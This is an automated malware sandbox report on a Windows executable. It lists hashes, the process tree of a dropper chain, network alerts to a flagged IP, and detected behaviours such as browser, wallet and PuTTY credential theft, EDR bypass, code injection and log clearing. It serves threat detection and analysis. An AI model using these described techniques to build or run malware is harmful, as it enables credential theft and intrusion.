Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
w3245.exe

Overview

General Information

Sample name:w3245.exe
Analysis ID:1584991
MD5:e92b4d3ee13da899ea0ad5b54a0094ed
SHA1:6068b49ac36eb618d20f5b3b4efad1d9bac68f5b
SHA256:97abaf743b7b33aa0f0c6ab83527cc253c9e231c4e68da5d9a42fc45ef655877
Tags:exeuser-NatrXN1O1
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)

Classification

Process Tree

  • System is w10x64
  • w3245.exe (PID: 7340 cmdline: "C:\Users\user\Desktop\w3245.exe" MD5: E92B4D3EE13DA899EA0AD5B54A0094ED)
    • w3245.exe (PID: 7360 cmdline: "C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exe" -burn.clean.room="C:\Users\user\Desktop\w3245.exe" -burn.filehandle.attached=688 -burn.filehandle.self=692 MD5: EC4072E1AE2A9316270E6AFD66235A97)
      • RescueCDBurner.exe (PID: 7424 cmdline: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exe MD5: 11C8962675B6D535C018A63BE0821E4C)
        • RescueCDBurner.exe (PID: 7440 cmdline: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe MD5: 11C8962675B6D535C018A63BE0821E4C)
          • cmd.exe (PID: 7460 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • LocalCtrl_alpha_v3.exe (PID: 8032 cmdline: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe MD5: 967F4470627F823F4D7981E511C9824F)
              • msedge.exe (PID: 6048 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)
                • msedge.exe (PID: 7436 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=1980,i,14784043117474670596,10515819180786233861,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • RescueCDBurner.exe (PID: 7956 cmdline: "C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe" MD5: 11C8962675B6D535C018A63BE0821E4C)
    • cmd.exe (PID: 7976 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • LocalCtrl_alpha_v3.exe (PID: 8148 cmdline: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe MD5: 967F4470627F823F4D7981E511C9824F)
  • msedge.exe (PID: 5888 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 5664 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1996 --field-trial-handle=2092,i,4914835570454536205,3662400775575859441,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 3716 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6740 --field-trial-handle=2092,i,4914835570454536205,3662400775575859441,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 4556 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6752 --field-trial-handle=2092,i,4914835570454536205,3662400775575859441,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • identity_helper.exe (PID: 7024 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7228 --field-trial-handle=2092,i,4914835570454536205,3662400775575859441,262144 /prefetch:8 MD5: 76C58E5BABFE4ACF0308AA646FC0F416)
    • identity_helper.exe (PID: 7060 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7228 --field-trial-handle=2092,i,4914835570454536205,3662400775575859441,262144 /prefetch:8 MD5: 76C58E5BABFE4ACF0308AA646FC0F416)
    • msedge.exe (PID: 5544 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=5752 --field-trial-handle=2092,i,4914835570454536205,3662400775575859441,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • msedge.exe (PID: 7800 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 6496 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1516 --field-trial-handle=2100,i,1290917253854219451,795298086300262693,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • msedge.exe (PID: 3176 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 2800 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=952 --field-trial-handle=1852,i,10935174027407288712,12025004199992672972,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-06T23:17:48.719723+010020283713Unknown Traffic192.168.2.449850104.21.80.52443TCP
2025-01-06T23:17:50.082367+010020283713Unknown Traffic192.168.2.449861104.21.80.52443TCP
2025-01-06T23:17:51.375110+010020283713Unknown Traffic192.168.2.449872104.21.80.52443TCP
2025-01-06T23:18:10.796365+010020283713Unknown Traffic192.168.2.450061104.21.80.52443TCP
2025-01-06T23:18:12.862362+010020283713Unknown Traffic192.168.2.450073104.21.80.52443TCP
2025-01-06T23:18:21.925120+010020283713Unknown Traffic192.168.2.450111104.21.80.52443TCP
2025-01-06T23:18:23.353479+010020283713Unknown Traffic192.168.2.450112104.21.80.52443TCP
2025-01-06T23:18:24.479914+010020283713Unknown Traffic192.168.2.450113104.21.80.52443TCP
2025-01-06T23:18:25.469662+010020283713Unknown Traffic192.168.2.450114104.21.80.52443TCP
2025-01-06T23:18:27.736640+010020283713Unknown Traffic192.168.2.450115104.21.80.52443TCP
2025-01-06T23:18:29.468954+010020283713Unknown Traffic192.168.2.450116104.21.80.52443TCP
2025-01-06T23:18:30.654869+010020283713Unknown Traffic192.168.2.450117104.21.80.52443TCP
2025-01-06T23:18:42.932749+010020283713Unknown Traffic192.168.2.450118104.21.80.52443TCP
2025-01-06T23:18:44.191071+010020283713Unknown Traffic192.168.2.450119104.21.80.52443TCP
2025-01-06T23:18:45.270575+010020283713Unknown Traffic192.168.2.450120104.21.80.52443TCP
2025-01-06T23:18:46.127606+010020283713Unknown Traffic192.168.2.450121104.21.80.52443TCP
2025-01-06T23:18:48.265713+010020283713Unknown Traffic192.168.2.450122104.21.80.52443TCP
2025-01-06T23:18:50.519130+010020283713Unknown Traffic192.168.2.450123104.21.80.52443TCP
2025-01-06T23:18:51.816735+010020283713Unknown Traffic192.168.2.450124104.21.80.52443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_0091A0BB DecryptFileW,0_2_0091A0BB
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_0093FA62 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,ReadFile,GetLastError,CryptDestroyHash,CryptReleaseContext,GetLastError,CryptGetHashParam,GetLastError,SetFilePointerEx,GetLastError,0_2_0093FA62
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_00919E9E DecryptFileW,DecryptFileW,0_2_00919E9E
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_00C9A0BB DecryptFileW,1_2_00C9A0BB
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_00CBFA62 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,ReadFile,GetLastError,CryptDestroyHash,CryptReleaseContext,GetLastError,CryptGetHashParam,GetLastError,SetFilePointerEx,GetLastError,1_2_00CBFA62
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_00C99E9E DecryptFileW,DecryptFileW,1_2_00C99E9E
Source: RescueCDBurner.exe, 00000002.00000002.1749055364.000000006C229000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_44c6c15a-f
Source: w3245.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP, NET_RUN_FROM_SWAP
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeFile opened: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\msvcr100.dllJump to behavior
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:49850 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:49861 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:49872 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:50061 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:50073 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:50073 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:50111 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:50112 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:50113 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:50114 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:50115 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:50116 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:50117 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:50118 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:50119 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:50120 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:50121 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:50122 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:50123 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:50124 version: TLS 1.2
Source: w3245.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\agent\_work\8\s\build\ship\x86\burn.pdb source: w3245.exe, 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp, w3245.exe, 00000000.00000000.1694764523.000000000094B000.00000002.00000001.01000000.00000003.sdmp, w3245.exe, 00000001.00000000.1701554751.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp, w3245.exe, 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: msvcp100.i386.pdb source: RescueCDBurner.exe, RescueCDBurner.exe, 00000003.00000002.1807193825.000000006B491000.00000020.00000001.01000000.00000015.sdmp, RescueCDBurner.exe, 0000000A.00000002.2073421125.000000006BDB1000.00000020.00000001.01000000.00000015.sdmp
Source: Binary string: msvcr100.i386.pdb source: RescueCDBurner.exe, RescueCDBurner.exe, 00000003.00000002.1807089950.000000006B3D1000.00000020.00000001.01000000.00000016.sdmp, RescueCDBurner.exe, 0000000A.00000002.2073697527.000000006BFB1000.00000020.00000001.01000000.00000016.sdmp
Source: Binary string: wntdll.pdbUGP source: RescueCDBurner.exe, 00000002.00000002.1748082870.000000000A080000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000002.00000002.1747896540.0000000009D22000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1805704607.000000000A11A000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1805953912.000000000A82C000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1805820438.000000000A470000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2091445056.0000000004D9B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2092120165.0000000005670000.00000004.00001000.00020000.00000000.sdmp, RescueCDBurner.exe, 0000000A.00000002.2068385981.000000000A215000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: RescueCDBurner.exe, 00000002.00000002.1748082870.000000000A080000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000002.00000002.1747896540.0000000009D22000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1805704607.000000000A11A000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1805953912.000000000A82C000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1805820438.000000000A470000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2091445056.0000000004D9B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2092120165.0000000005670000.00000004.00001000.00020000.00000000.sdmp, RescueCDBurner.exe, 0000000A.00000002.2068385981.000000000A215000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: E:\PassNow\MagicRescueCD\CD_Win_Burner\Release\RescueCDBurner.pdb0 source: RescueCDBurner.exe, 00000002.00000002.1735661365.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000003.1731750258.0000000000E9A000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000002.00000000.1720100266.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1801166894.0000000000654000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000000.1734881847.0000000000654000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: E:\PassNow\MagicRescueCD\CD_Win_Burner\Release\RescueCDBurner.pdb source: RescueCDBurner.exe, 00000002.00000002.1735661365.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000003.1731750258.0000000000E9A000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000002.00000000.1720100266.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1801166894.0000000000654000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000000.1734881847.0000000000654000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: f:\starburn\Bin\LIBCMT\Dynamic\Release\i386\StarBurn.pdb source: RescueCDBurner.exe, 00000002.00000002.1749820013.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, RescueCDBurner.exe, 00000003.00000002.1807780117.000000006B8F1000.00000020.00000001.01000000.00000011.sdmp, RescueCDBurner.exe, 0000000A.00000002.2074506885.000000006F841000.00000020.00000001.01000000.00000011.sdmp
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_00903CC4 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,0_2_00903CC4
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_00944440 FindFirstFileW,FindClose,0_2_00944440
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_00919B43 FindFirstFileW,lstrlenW,FindNextFileW,FindClose,0_2_00919B43
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_00CC4440 FindFirstFileW,FindClose,1_2_00CC4440
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_00C99B43 FindFirstFileW,lstrlenW,FindNextFileW,FindClose,1_2_00C99B43
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_00C83CC4 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,1_2_00C83CC4
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_5BB3D32E _FindFirstFileEx_@24,GetVersionExA,SetLastError,newMultiByteFromWideChar,LoadLibraryW,GetProcAddress,FreeLibrary,GlobalFree,1_2_5BB3D32E
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_5BB3D43A _FindFirstFile_@8,SetLastError,memset,newMultiByteFromWideChar,FindFirstFileA,MultiByteToWideChar,MultiByteToWideChar,GlobalFree,1_2_5BB3D43A
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B42C8FD _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,3_2_6B42C8FD
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B43088A _wstat32,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,3_2_6B43088A
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B42CC23 _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,3_2_6B42CC23
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B430CBB _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,3_2_6B430CBB
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B3F81A1 _wstat64i32,_wcspbrk,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,3_2_6B3F81A1
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B42E0BD _wfindfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,3_2_6B42E0BD
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B42DBC0 _findfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_seterrormode,SetErrorMode,3_2_6B42DBC0
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B42F9DD _stat64i32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime64_t,free,__wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,3_2_6B42F9DD
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B42FF0E _stat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,3_2_6B42FF0E
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B42F169 _stat32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,3_2_6B42F169
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B43110C _wstat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,3_2_6B43110C
